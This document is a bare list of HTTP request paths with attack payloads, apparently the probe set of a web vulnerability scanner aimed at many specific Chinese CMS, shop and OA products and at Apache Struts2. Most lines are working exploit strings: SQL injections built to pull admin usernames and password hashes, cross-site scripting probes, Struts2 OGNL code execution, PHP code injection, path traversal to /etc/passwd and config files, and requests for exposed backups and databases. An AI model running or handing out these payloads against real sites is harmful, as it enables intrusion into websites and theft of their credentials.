/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/api/uc_client/control/mail.php
/api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
/api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
/api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
/api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
/api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/subscribe.php?act=dounsubscribe
/productbuy/checkout.asp?11_22.html
/data/%23data.asp
/manage/Config/BackupRestore.aspx
/install/index.php.bak?insLockfile=1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
/?cart-addGoodsToCart.html
/install/index.php?step=active
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/install/index.php?step=1&insLockfile=1
/plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
/plus/ad_js.php?aid=1&nocache=1
/admin.php
/resume/?key=xxxx%bf%22;alert(360);//
/register.php?do=check
/about/?module=../robots.txt&fmodule=7
/plus/Promotion.asp
/besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
/index.php?m=announcement&s=admin/notice
/item/?c-5,key-1'.html
/admin/fileopen.asp?filename=../index.asp
/cache/bak_mysql.txt
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
/product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
/user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
/article_cat.php?id=12
/passport-verify.html
/user/userzone/School/download.aspx?f=/config/ConnectionStrings.config
/ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23
/statistics.php?referer=http://www.google.com/search?q=a%2527),(null,null,null,null,null,null,null,null,(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20concat(user_name,0x7c,password)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b))%23&b=c&pageurl=1
/inquiry.php?action=inquiry
/install/index.php?_m=frontpage&_a=check
/api.php?act=get_spec_single&api_version=3.1
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/api.php?act=get_product_detail_info&api_version=3.1
/api.php?act=get_products_list&api_version=3.1
/?tools-products.html
/index.php?case=admin&act=login&admin_dir=admin&site=default
/index.php?case=user&act=space&mid=1
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit=
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=Order&a=index
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/api/search.php?moduleid=5
/item.php?act=ajax&do=subject&op=get_membereffect
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?case=manage&act=guestadd&manage=archive&guest=1
/article.php?act=list&catid=0&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,schema_name,0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
